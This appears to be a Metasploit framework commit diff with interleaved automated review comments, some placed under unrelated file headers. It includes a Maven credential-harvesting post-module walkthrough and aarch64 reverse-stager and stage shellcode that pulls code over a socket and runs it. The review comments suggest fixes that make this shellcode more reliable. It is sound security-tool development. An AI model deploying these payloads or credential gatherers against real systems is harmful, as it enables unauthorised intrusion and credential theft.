@@ -0,0 +1,64 @@ +## Vulnerable Application + +[Maven](https://maven.apache.org/) a software project management. +This module seeks all settings.xml (Maven configuration file) on the target file system to extract credentials from them. +Credentials are store in the tag ; the module also tries to cross the identifier found with the or + tag in order to find the full realm the credentials belong to. + +This module was successfully tested against: + +- Ubuntu 14.04 and Maven 3.0.5 with shell and meterpreter as session type +- Debian 9 and Maven 3.0.5 with shell and meterpreter as session type + +## Verification Steps + + 1. Get a `shell` or `meterpreter` session on some host. + 2. Do: ```use post/multi/gather/maven_creds``` + 3. Do: ```set SESSION [SESSION_ID]``` + 4. Do: ```run``` + 5. If the system has readable configuration files (settings.xml) containing username and passwords, they will be printed out. + +## Scenarios + +### Ubuntu 14.04 and Maven version 3.0.5 + +``` +msf post(maven_creds) > run + +[*] Finding user directories +[*] Unix OS detected +[*] Looting 19 files +[*] Downloading /home/user/settings.xml +[*] Reading settings.xml file from /home/user/settings.xml +[*] Collected the following credentials: +[*] Id: server-nexus-dev +[*] Username: deploynexus-dev +[*] Password: password-dev +[*] Try to find url from id... +[*] No url found, id will be set as realm + +[*] Collected the following credentials: +[*] Id: server-nexus-int +[*] Username: deploynexus-int +[*] Password: password-int +[*] Try to find url from id... +[*] Found url in mirror : http://www.myhost.com/int + +[*] Collected the following credentials: +[*] Id: server-nexus-prd +[*] Username: deploynexus-prd +[*] Password: password-prd +[*] Try to find url from id... 
+[*] Found url in repository : http://www.myhost.com/prd + + +msf post(maven_creds) > creds + +Credentials +=========== + +host origin service public private realm private_type +---- ------ ------- ------ ------- ----- ------------ + deploynexus-dev password-dev server-nexus-dev Password + deploynexus-int password-int http://www.myhost.com/int Password + deploynexus-prd password-prd http://www.myhost.com/prd Password \ No newline at end of file diff --git a/external/source/meterpreter/README b/external/source/meterpreter/README index 5fd64608e6..d22b98ad8b 100644 --- a/external/source/meterpreter/README +++ b/external/source/meterpreter/README @@ -1,2 +1,2 @@ -Meterpreter source code has moved to its own repository, hosted at -https://github.com/rapid7/meterpreter +Meterpreter source code is part of the metasploit-payloads repository, hosted at +https://github.com/rapid7/metasploit-payloads diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s new file mode 100644 index 0000000000..0092c737ef --- /dev/null +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s 
@@ -0,0 +1,98 @@
+.equ SYS_READ, 0x3f
+.equ SYS_MMAP, 0xde
+.equ SYS_EXIT, 0x5d
+
+start:
+ adr x2, size
+ ldr w2, [x2]
+ mov x10, x2
+
+ /* Page-align, assume <4GB */
+ lsr x2, x2, #12
+ add x2, x2, #1
+ lsl x2, x2, #12
+
+ /* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */
+ mov x0, xzr
+ mov x1, x2
+ mov x2, #7
+ mov x3, #34
+ mov x4, xzr
+ mov x5, xzr
+ mov x8, SYS_MMAP
+ svc 0
+
+ /* Grab the saved size, save the address */
+ mov x4, x10
+
+ /* Save the memory address */
+ mov x3, x0
+ mov x10, x0
+
+read_loop:
+ /* read(sockfd, buf='x3', nbytes='x4') */
+ mov x0, x12
+ mov x1, x3
+ mov x2, x4
+ mov x8, SYS_READ
+ svc 0
+ cbz w0, failed
+ add x3, x3, x0
+ subs x4, x4, x0
+ bne read_loop
+
+ /* add entry_offset */
+ adr x0, entry
+ ldr x0, [x0]
+ add x0, x0, x10
+ mov x14, x0
+
+ /* set up the initial stack */
+ mov x0, sp
+ and sp, x0, #-16
+ add sp, sp, #(16 * 6)
+
+ /* argc = 2, argv[0] = 'm' */
+ mov x0, #2
+ mov x1, #109
+ str x1, [sp]
+ mov x1, sp
+
+ mov x2, x12
+ mov x3, 0
+
+ mov x4, 0
+ mov x5, #7 /* AT_BASE */
+
+ mov x6, x10
+ mov x7, #6 /* AT_PAGESZ */
+
+ mov x8, #0x1000
+ mov x9, #25 /* AT_RANDOM */
+
+ mov x10, x10
+ mov x11, #0 /* AT_NULL */
+
+ stp x10, x11, [sp, #-16]!
+ stp x8, x9, [sp, #-16]!
+ stp x6, x7, [sp, #-16]!
+ stp x4, x5, [sp, #-16]!
+ stp x2, x3, [sp, #-16]!
+ stp x0, x1, [sp, #-16]!
+
+ mov x29, #0
+ mov x30, #0
+ br x14
+
+failed:
+ mov x0, 0
+ mov x8, SYS_EXIT
+ svc 0
+
+.balign 16
+size:
+ .word 0
+ .word 0
+entry:
+ .word 0
+ .word 0
diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
index 7c049b8308..f8b354fbc5 100644
--- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s
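Review bot: In read_loop, `cbz w0, failed` only exits on a zero-length read; a negative return (the kernel reports failure as -errno in x0) passes through, so `add x3, x3, x0` moves the write pointer backwards and `subs x4, x4, x0` grows the remaining count, turning a socket error into an unbounded read into the mapped buffer. The mmap result is likewise used as the buffer address without any check. A sign test covers both cases: replace the guard with `cmp x0, #0` / `b.le failed`, and add `tbnz x0, #63, failed` after the mmap `svc 0`. `mov x10, x10` before the AT_NULL pair is a no-op; if AT_RANDOM is meant to point at the image base rather than at 16 random bytes, a comment saying so would help the next reader.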
@@ -37,9 +37,10 @@ start: mov x2, #4 mov x8, SYS_READ svc 0 - cbz w0, failed + cmn x0, #0x1 + beq failed - ldr x2, [sp,#0] + ldr w2, [sp,#0] /* Page-align, assume <4GB */ lsr x2, x2, #12 @@ -53,12 +54,13 @@ start: mov x3, #34 mov x4, xzr mov x5, xzr - /* call mmap() */ - movi x8, SYS_MMAP + mov x8, SYS_MMAP svc 0 + cmn x0, #0x1 + beq failed /* Grab the saved size, save the address */ - ldr x4, [sp] + ldr w4, [sp] /* Save the memory address */ str x0, [sp] @@ -73,13 +75,15 @@ read_loop: mov x2, x4 mov x8, SYS_READ svc 0 + cmn x0, #0x1 + beq failed add x3, x3, x0 subs x4, x4, x0 bne read_loop /* Go to shellcode */ - ldr x30, [sp] - ret + ldr x0, [sp] + blr x0 failed: mov x0, 0 diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 9c062275bb..96d0b07868 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.0" + VERSION = "4.16.9" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index d404504a51..eca7b90851 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -582,7 +582,7 @@ class ReadableText row << 'N' end - if session.exploit_datastore.has_key?('LURI') && !session.exploit_datastore['LURI'].empty? + if session.exploit_datastore && session.exploit_datastore.has_key?('LURI') && !session.exploit_datastore['LURI'].empty? row << " (#{session.exploit_datastore['LURI']})" else row << '?' 
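Review bot: `cmn x0, #0x1` / `beq failed` after each `svc 0` only matches a return of exactly -1, but a raw Linux syscall returns `-errno` (e.g. -104 for ECONNRESET, -11 for EAGAIN), so most failures slip through, and with the old `cbz w0, failed` removed a 0-byte read (peer closed) now falls through as well: in `read_loop`, `subs x4, x4, x0` / `bne read_loop` then spins forever on a dead socket. A signed compare handles both, `cmp x0, #1` / `b.lt failed` after the two reads, and `tbnz x0, #63, failed` after mmap (a `-errno` has bit 63 set; a mapped address never does). The initial 4-byte length read still assumes a single read returned all 4 bytes; the `ldr w2` change narrows the load but does not handle a short read.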
@@ -622,7 +622,7 @@ class ReadableText sess_type = session.type.to_s sess_uuid = session.payload_uuid.to_s sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil - sess_luri = session.exploit_datastore['LURI'] || "" + sess_luri = session.exploit_datastore['LURI'] || "" if session.exploit_datastore sess_enc = false if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key] sess_enc = true @@ -655,7 +655,7 @@ class ReadableText out << " UUID: #{sess_uuid}\n" out << " CheckIn: #{sess_checkin}\n" out << " Registered: #{sess_registration}\n" - unless sess_luri.empty? + unless (sess_luri || '').empty? out << " LURI: #{sess_luri}\n" end diff --git a/lib/msf/base/sessions/hwbridge.rb b/lib/msf/base/sessions/hwbridge.rb index 171d8b9464..e04e7609ed 100644 --- a/lib/msf/base/sessions/hwbridge.rb +++ b/lib/msf/base/sessions/hwbridge.rb @@ -196,6 +196,10 @@ class HWBridge < Rex::Post::HWBridge::Client attr_accessor :console # :nodoc: attr_accessor :alive # :nodoc: + attr_accessor :api_version + attr_accessor :fw_version + attr_accessor :hw_version + attr_accessor :device_name private attr_accessor :rstream # :nodoc: diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index d17ee6edd7..110e1fef3d 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -40,6 +40,14 @@ class Meterpreter < Rex::Post::Meterpreter::Client true end + def tunnel_to_s + if self.pivot_session + "Pivot via [#{self.pivot_session.tunnel_to_s}]" + else + super + end + end + # # Initializes a meterpreter session instance using the supplied rstream # that is to be used as the client's connection to the server. 
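Review bot: `sess_luri = session.exploit_datastore['LURI'] || "" if session.exploit_datastore` leaves `sess_luri` as nil when there is no exploit datastore, which is why the following hunk has to re-guard with `(sess_luri || '')`. Normalising once keeps the later check unchanged: `sess_luri = session.exploit_datastore ? session.exploit_datastore['LURI'].to_s : ''`, after which `unless sess_luri.empty?` is sufficient. The enclosing method starts and ends outside this hunk.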
@@ -112,6 +120,80 @@ class Meterpreter < Rex::Post::Meterpreter::Client end + def bootstrap(datastore = {}, handler = nil) + session = self + + init_session = Proc.new do + # Configure unicode encoding before loading stdapi + session.encode_unicode = datastore['EnableUnicodeEncoding'] + + session.init_ui(self.user_input, self.user_output) + + session.tlv_enc_key = session.core.negotiate_tlv_encryption + + unless datastore['AutoVerifySession'] == false + unless session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i) + print_error("Meterpreter session #{session.sid} is not valid and will be closed") + # Terminate the session without cleanup if it did not validate + session.skip_cleanup = true + session.kill + return nil + end + end + + # always make sure that the new session has a new guid if it's not already known + guid = session.session_guid + if guid == "\x00" * 16 + guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') + session.core.set_session_guid(guid) + session.session_guid = guid + # TODO: New statgeless session, do some account in the DB so we can track it later. + else + # TODO: This session was either staged or previously known, and so we shold do some accounting here! + end + + unless datastore['AutoLoadStdapi'] == false + + session.load_stdapi + + unless datastore['AutoSystemInfo'] == false + session.load_session_info + end + + # only load priv on native windows + # TODO: abastrct this too, to remove windows stuff + if session.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(session.arch) + session.load_priv rescue nil + end + end + + # TODO: abstract this a little, perhaps a "post load" function that removes + # platform-specific stuff? + if session.platform == 'android' + session.load_android + end + + ['InitialAutoRunScript', 'AutoRunScript'].each do |key| + unless datastore[key].nil? || datastore[key].empty? 
+ args = Shellwords.shellwords(datastore[key]) + print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'") + session.execute_script(args.shift, *args) + end + end + + # Process the auto-run scripts for this session + if self.respond_to?(:process_autoruns) + self.process_autoruns(datastore) + end + + # Tell the handler that we have a session + handler.on_session(self) if handler + end + + # Defer the session initialization to the Session Manager scheduler + framework.sessions.schedule init_session + end + ## # :category: Msf::Session::Provider::SingleCommandShell implementors # @@ -255,14 +337,14 @@ class Meterpreter < Rex::Post::Meterpreter::Client # # Terminates the session # - def kill + def kill(reason='') begin cleanup_meterpreter self.sock.close if self.sock rescue ::Exception end # deregister will actually trigger another cleanup - framework.sessions.deregister(self) + framework.sessions.deregister(self, reason) end # diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index 7c785906ac..09c8a97eff 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb 
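Review bot: `return nil` inside `init_session` is a `return` in a `Proc.new` block, and that proc is only executed later by `framework.sessions.schedule init_session`, after `bootstrap` itself has returned, so an invalid session raises `LocalJumpError` on the scheduler thread instead of just being killed; the `on_session` version this replaces avoided that with a `valid` flag. Use `next` (or `next nil`), which ends the proc, in place of `return nil` after `session.kill`. The rest of the proc matches the removed `on_session` body, so no other behaviour change is expected from it.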
@@ -3,105 +3,74 @@ require 'shellwords' module Msf -module Sessions -module MeterpreterOptions + module Sessions + # + # Defines common options across all Meterpreter implementations + # + module MeterpreterOptions - def initialize(info = {}) - super(info) + TIMEOUT_SESSION = 24 * 3600 * 7 # 1 week + TIMEOUT_COMMS = 300 # 5 minutes + TIMEOUT_RETRY_TOTAL = 60 * 60 # 1 hour + TIMEOUT_RETRY_WAIT = 10 # 10 seconds - register_advanced_options( - [ - OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]), - OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]), - OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 30]), - OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']), - OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']), - OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]), - OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]), - OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]), - OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]), - OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]), - OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]), - OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 
Rex::Post::Meterpreter::ClientCore::TIMEOUT_COMMS]) - ], self.class) + def initialize(info = {}) + super(info) + + register_advanced_options( + [ + OptBool.new( + 'AutoLoadStdapi', + [true, "Automatically load the Stdapi extension", true] + ), + OptBool.new( + 'AutoVerifySession', + [true, "Automatically verify and drop invalid sessions", true] + ), + OptInt.new( + 'AutoVerifySessionTimeout', + [false, "Timeout period to wait for session validation to occur, in seconds", 30] + ), + OptString.new( + 'InitialAutoRunScript', + [false, "An initial script to run on session creation (before AutoRunScript)", ''] + ), + OptString.new( + 'AutoRunScript', + [false, "A script to run automatically on session creation.", ''] + ), + OptBool.new( + 'AutoSystemInfo', + [true, "Automatically capture system information on initialization.", true] + ), + OptBool.new( + 'EnableUnicodeEncoding', + [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows] + ), + OptPath.new( + 'HandlerSSLCert', + [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"] + ), + OptInt.new( + 'SessionRetryTotal', + [false, "Number of seconds try reconnecting for on network failure", TIMEOUT_RETRY_TOTAL] + ), + OptInt.new( + 'SessionRetryWait', + [false, "Number of seconds to wait between reconnect attempts", TIMEOUT_RETRY_WAIT] + ), + OptInt.new( + 'SessionExpirationTimeout', + [ false, 'The number of seconds before this session should be forcibly shut down', TIMEOUT_SESSION] + ), + OptInt.new( + 'SessionCommunicationTimeout', + [ false, 'The number of seconds of no activity before this session should be killed', TIMEOUT_COMMS] + ) + ], + self.class + ) + end + end end - - # - # Once a session is created, automatically load the stdapi extension if the - # advanced option is set to true. 
- # - def on_session(session) - super - - # Defer the session initialization to the Session Manager scheduler - framework.sessions.schedule Proc.new { - - # Configure unicode encoding before loading stdapi - session.encode_unicode = datastore['EnableUnicodeEncoding'] - - session.init_ui(self.user_input, self.user_output) - - valid = true - - session.tlv_enc_key = session.core.negotiate_tlv_encryption - - if datastore['AutoVerifySession'] - if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i) - print_error("Meterpreter session #{session.sid} is not valid and will be closed") - valid = false - end - end - - if valid - # always make sure that the new session has a new guid if it's not already known - guid = session.session_guid - if guid == '00000000-0000-0000-0000-000000000000' - guid = SecureRandom.uuid - session.core.set_session_guid(guid) - session.session_guid = guid - # TODO: New statgeless session, do some account in the DB so we can track it later. - else - # TODO: This session was either staged or previously known, and so we shold do some accounting here! - end - - if datastore['AutoLoadStdapi'] - - session.load_stdapi - - if datastore['AutoSystemInfo'] - session.load_session_info - end - - # only load priv on native windows - if session.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(session.arch) - session.load_priv rescue nil - end - end - - if session.platform == 'android' - session.load_android - end - - [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key| - unless datastore[key].empty? - args = Shellwords.shellwords( datastore[key] ) - print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'") - session.execute_script(args.shift, *args) - end - end - end - - # Terminate the session without cleanup if it did not validate - if not valid - session.skip_cleanup = true - session.kill - end - - } - - end - end -end -end - 
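Review bot: The four `TIMEOUT_*` constants added at the top of the module replace the `Rex::Post::Meterpreter::ClientCore::TIMEOUT_*` references the removed option list used as defaults, so the defaults the options advertise and whatever the client core still uses are now two independent copies. If `ClientCore` keeps its own constants (not visible here), either alias them, e.g. `TIMEOUT_SESSION = Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION`, or add a one-line comment above the block stating which side is authoritative so they are not edited independently. The `initialize` method itself is a straight re-indent of the previous option list.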
diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb index 5c8efdade8..b866b5091f 100644 --- a/lib/msf/core/auxiliary/login.rb +++ b/lib/msf/core/auxiliary/login.rb @@ -44,6 +44,7 @@ module Auxiliary::Login Unable | Error | Denied | Reject | Refuse | Close | Closing | %\ Bad | Sorry | + ^http | html | Not\ on\ system\ console | Enter\ username\ and\ password | Auto\ Apply\ On | diff --git a/lib/msf/core/auxiliary/udp_scanner.rb b/lib/msf/core/auxiliary/udp_scanner.rb index 6f828f8276..c453115864 100644 --- a/lib/msf/core/auxiliary/udp_scanner.rb +++ b/lib/msf/core/auxiliary/udp_scanner.rb @@ -43,18 +43,20 @@ module Auxiliary::UDPScanner datastore['BATCHSIZE'].to_i end - def udp_socket(ip, port) + def udp_socket(ip, port, bind_peer: true) + key = "#{ip}:#{port}:#{bind_peer ? 'bound' : 'unbound'}" @udp_sockets_mutex.synchronize do - key = "#{ip}:#{port}" unless @udp_sockets.key?(key) - @udp_sockets[key] = - Rex::Socket::Udp.create({ - 'LocalHost' => datastore['CHOST'] || nil, - 'LocalPort' => datastore['CPORT'] || 0, - 'PeerHost' => ip, - 'PeerPort' => port, - 'Context' => { 'Msf' => framework, 'MsfExploit' => self } - }) + sock_info = { + 'LocalHost' => datastore['CHOST'] || nil, + 'LocalPort' => datastore['CPORT'] || 0, + 'Context' => { 'Msf' => framework, 'MsfExploit' => self } + } + if bind_peer + sock_info['PeerHost'] = ip + sock_info['PeerPort'] = port + end + @udp_sockets[key] = Rex::Socket::Udp.create(sock_info) add_socket(@udp_sockets[key]) end return @udp_sockets[key] 
@@ -123,10 +125,16 @@ module Auxiliary::UDPScanner data = data.to_binary_s if data.respond_to?('to_binary_s') resend_count = 0 - sock = nil + begin - sock = udp_socket(ip, port) - sock.send(data, 0) + addrinfo = Addrinfo.ip(ip) + unless addrinfo.ipv4_multicast? || addrinfo.ipv6_multicast? + sock = udp_socket(ip, port, bind_peer: true) + sock.send(data, 0) + else + sock = udp_socket(ip, port, bind_peer: false) + sock.sendto(data, ip, port, 0) + end rescue ::Errno::ENOBUFS resend_count += 1 @@ -136,8 +144,7 @@ module Auxiliary::UDPScanner end scanner_recv(0.1) - - ::IO.select(nil, nil, nil, 0.25) + sleep(0.25) retry diff --git a/lib/msf/core/db_manager/import/nessus/xml/v2.rb b/lib/msf/core/db_manager/import/nessus/xml/v2.rb index 00822d03b7..c17934074f 100644 --- a/lib/msf/core/db_manager/import/nessus/xml/v2.rb +++ b/lib/msf/core/db_manager/import/nessus/xml/v2.rb @@ -74,7 +74,7 @@ module Msf::DBManager::Import::Nessus::XML::V2 nasl = item['nasl'].to_s nasl_name = item['nasl_name'].to_s port = item['port'].to_s - proto = item['proto'] || "tcp" + proto = item['proto'] ? item['proto'].downcase : "tcp" sname = item['svc_name'] severity = item['severity'] description = item['description'] diff --git a/lib/msf/core/exploit/http/wordpress/helpers.rb b/lib/msf/core/exploit/http/wordpress/helpers.rb index 206b0364c7..f938620420 100644 --- a/lib/msf/core/exploit/http/wordpress/helpers.rb +++ b/lib/msf/core/exploit/http/wordpress/helpers.rb 
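Review bot: `Addrinfo.ip(ip)` raises `SocketError` for anything that is not a numeric address (a hostname, an empty string), and the surrounding `begin` only rescues `::Errno::ENOBUFS`, so one such target now aborts the whole `scanner_send` call instead of just that send. If callers do not guarantee numeric addresses here (not visible in this hunk), add a branch that skips the target rather than retrying: `rescue ::SocketError => e` / `vprint_error("#{ip}:#{port} - #{e.message}")` / `return`. The `sleep(0.25)` replacing `IO.select` is equivalent for this purpose.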
@@ -10,12 +10,12 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param pass [String] Password # @param redirect URL [String] to redirect after successful login # @return [Hash] The post data for vars_post Parameter - def wordpress_helper_login_post_data(user, pass, redirect=nil) + def wordpress_helper_login_post_data(user, pass, redirect = nil) post_data = { - 'log' => user.to_s, - 'pwd' => pass.to_s, - 'redirect_to' => redirect.to_s, - 'wp-submit' => 'Login' + 'log' => user.to_s, + 'pwd' => pass.to_s, + 'redirect_to' => redirect.to_s, + 'wp-submit' => 'Login' } post_data end @@ -31,23 +31,23 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @return [String,nil] The location of the new comment/post, nil on error def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url) vars_post = { - 'comment' => comment, - 'submit' => 'Post+Comment', - 'comment_post_ID' => comment_post_id.to_s, - 'comment_parent' => '0' + 'comment' => comment, + 'submit' => 'Post+Comment', + 'comment_post_ID' => comment_post_id.to_s, + 'comment_parent' => '0' } vars_post.merge!({ - 'author' => author, - 'email' => email, - 'url' => url, + 'author' => author, + 'email' => email, + 'url' => url }) unless login_cookie options = { - 'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'), - 'method' => 'POST' + 'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'), + 'method' => 'POST' } - options.merge!({'vars_post' => vars_post}) - options.merge!({'cookie' => login_cookie}) if login_cookie + options.merge!({ 'vars_post' => vars_post }) + options.merge!({ 'cookie' => login_cookie }) if login_cookie res = send_request_cgi(options) if res && res.redirect? && res.redirection return wordpress_helper_parse_location_header(res) 
@@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found # @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user # @return [Integer,nil] The post id, nil when nothing found - def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil) + def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil) range.each { |id| vprint_status("Checking POST ID #{id}...") if (id % 100) == 0 body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie) @@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param comments_enabled [Boolean] Check if comments are enabled on this post # @param login_cookie [String] A valid login cookie to perform the check as an authenticated user # @return [String,nil] the HTTP response body of the post, nil otherwise - def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil) + def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil) options = { - 'method' => 'GET', - 'uri' => uri + 'method' => 'GET', + 'uri' => uri } - options.merge!({'cookie' => login_cookie}) if login_cookie + options.merge!({ 'cookie' => login_cookie }) if login_cookie res = send_request_cgi(options) # post exists - if res and res.code == 200 + if res && res.code == 200 # also check if comments are enabled if comments_enabled if res.body =~ /form.*action.*wp-comments-post\.php/ 
@@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # # @param cookie [String] A valid admin session cookie # @return [String,nil] The nonce, nil on error - def wordpress_helper_get_plugin_upload_nonce(cookie) - uri = normalize_uri(wordpress_url_backend, 'plugin-install.php') + def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil) + uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php') options = { 'method' => 'GET', 'uri' => uri, @@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers res = send_request_cgi(options) if res && res.code == 200 return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1] + elsif res && res.redirect? && res.redirection + path = wordpress_helper_parse_location_header(res) + return wordpress_helper_get_plugin_upload_nonce(cookie, path) end end end diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index bbd899a0e0..9f39bfc922 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -244,11 +244,10 @@ protected framework.sessions.register(session) # Call the handler's on_session() method - on_session(session) - - # Process the auto-run scripts for this session - if session.respond_to?('process_autoruns') - session.process_autoruns(datastore) + if session.respond_to?(:bootstrap) + session.bootstrap(datastore, self) + else + on_session(session) end # If there is an exploit associated with this payload, then let's notify diff --git a/lib/msf/core/handler/reverse_named_pipe.rb b/lib/msf/core/handler/reverse_named_pipe.rb new file mode 100644 index 0000000000..51573e9c8b --- /dev/null +++ b/lib/msf/core/handler/reverse_named_pipe.rb 
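Review bot: The new redirect branch calls `wordpress_helper_get_plugin_upload_nonce` recursively with no depth bound, so a redirect loop (for example a backend that bounces an expired session between `plugin-install.php` and the login page, each answering with a Location header) recurses until `SystemStackError` instead of returning nil. Bound it: `def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil, depth = 0)`, `return nil if depth > 3` at the top, and `wordpress_helper_get_plugin_upload_nonce(cookie, path, depth + 1)` in the redirect branch. Whether `wordpress_helper_parse_location_header` reduces a cross-host absolute Location to a path is not visible here; if it does not, the follow-up request would go wherever the target points it.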
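Review bot: The `else` branch keeps only `on_session(session)` and drops the `process_autoruns(datastore)` call this code previously made for every session responding to it, so a session class that defines `process_autoruns` but not `bootstrap` (only the Meterpreter session's `bootstrap` is visible in this commit) no longer gets its AutoRunScript handling. Unless every such class is known to bootstrap itself, keep the old behaviour in the else branch: `on_session(session)` followed by `session.process_autoruns(datastore) if session.respond_to?(:process_autoruns)`. The enclosing method starts and ends outside this hunk.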
@@ -0,0 +1,76 @@ +# -*- coding: binary -*- +require 'thread' +require 'msf/core/post_mixin' + +module Msf +module Handler +### +# +# TODO: docs +# +### +module ReverseNamedPipe + + include Msf::Handler + + # + # Returns the string representation of the handler type, in this case + # 'reverse_named_pipe'. + # + def self.handler_type + "reverse_named_pipe" + end + + # + # Returns the connection-described general handler type, in this case + # 'reverse'. + # + def self.general_handler_type + "reverse" + end + + # + # Initializes the reverse handler and ads the options that are required + # for reverse named pipe payloads. + # + def initialize(info={}) + super + + register_options([ + OptString.new('PIPENAME', [true, 'Name of the pipe to listen on', 'msf-pipe']), + OptString.new('PIPEHOST', [true, 'Host of the pipe to connect to', '.']) + ], Msf::Handler::ReverseNamedPipe) + end + + # + # Closes the listener socket if one was created. + # + def cleanup_handler + # we're just pretending to be a handler + end + + # A string suitable for displaying to the user + # + # @return [String] + def human_name + "reverse named pipe" + end + + # + # Starts monitoring for an inbound connection. + # + def start_handler + # we're just pretending to be a handler + end + + # + # Stops monitoring for an inbound connection. + # + def stop_handler + # we're just pretending to be a handler + end + +end +end +end + diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index 8fe2e8b217..90f82c3bd5 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -352,6 +352,14 @@ class Msf::Module::Platform Alias = "java" end + # + # R + # + class R < Msf::Module::Platform + Rank = 100 + Alias = "r" + end + # # Ruby # diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index bb7d04ae8b..cddbee7108 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb 
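Review bot: The module header is still `TODO: docs`, and the three `# we're just pretending to be a handler` bodies do not say why `start_handler`, `stop_handler` and `cleanup_handler` are intentional no-ops, which a reader expecting a `Msf::Handler` implementor to open a listener will trip over. Replace the TODO with something like `# Handler stub for reverse named-pipe payloads: it contributes the PIPENAME/PIPEHOST options and a handler_type only; no listener is opened here, so start/stop/cleanup are no-ops` (if the real establishment path lives elsewhere, name it). Also `ads` in the `initialize` comment should read `adds`.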
